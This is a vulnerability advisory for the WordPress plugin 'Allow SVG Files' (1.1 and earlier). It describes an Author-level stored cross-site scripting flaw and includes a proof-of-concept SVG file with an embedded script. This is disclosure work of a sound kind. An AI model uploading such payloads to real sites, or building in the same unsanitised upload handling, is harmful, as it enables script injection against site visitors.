WordPress Plugin Vulnerabilities
Allow SVG Files <= 1.1 - Author+ Stored Cross Site Scripting via SVG
Description
The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.
Proof of Concept
As an author or above, upload the below SVG file via the Media library:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400" />
  <script type="text/javascript"> alert(/XSS/); </script>
</svg>

The XSS will be triggered when accessing the file directly, e.g. https://example.com/wp-content/uploads/2022/05/xss.svg
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Luan Pedersini
Submitter
IBLISS Digital Security
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-07-04
Added
2022-07-04
Last Updated
2023-04-07